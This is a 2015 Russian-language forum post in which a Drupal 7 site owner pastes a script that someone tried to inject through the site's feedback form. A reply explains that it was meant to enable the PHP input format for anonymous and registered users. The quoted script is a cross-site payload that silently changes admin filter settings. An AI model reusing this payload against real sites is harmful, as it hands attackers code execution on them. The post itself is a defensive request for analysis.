24 апреля 2015 в 9:08
Hi All!
Наш сайт (на Д7) пытаются взломать. Есть подозрения что некоторые вещи злоумышленникам удавались (пару дней назад на утро таблица semaphore имела статус crashed), а сегодня через форму обратной связи была попытка пропихнуть скрипт:
<?php$.get(Drupal.settings.basePath + admin/settings/filters/3,
function(response){
var form = $(#filter-admin-format-form, response);
form.find(#edit-roles-1).attr(checked, checked);
form.find(#edit-roles-2).attr(checked, checked);
$.post(Drupal.settings.basePath + admin/settings/filters/3,
form.serialize());
});?>Вопрос знатокам относительно данного скрипта - что он должен был сделать, что хотел хацкер и на что обратить внимание в плане безопасности?
Думаю, многим будет полезно.
Заранее большое спасибо!
С ув., Михаил.
Комментарии
хотел включить пхп формат ввода для анонимов и зареганых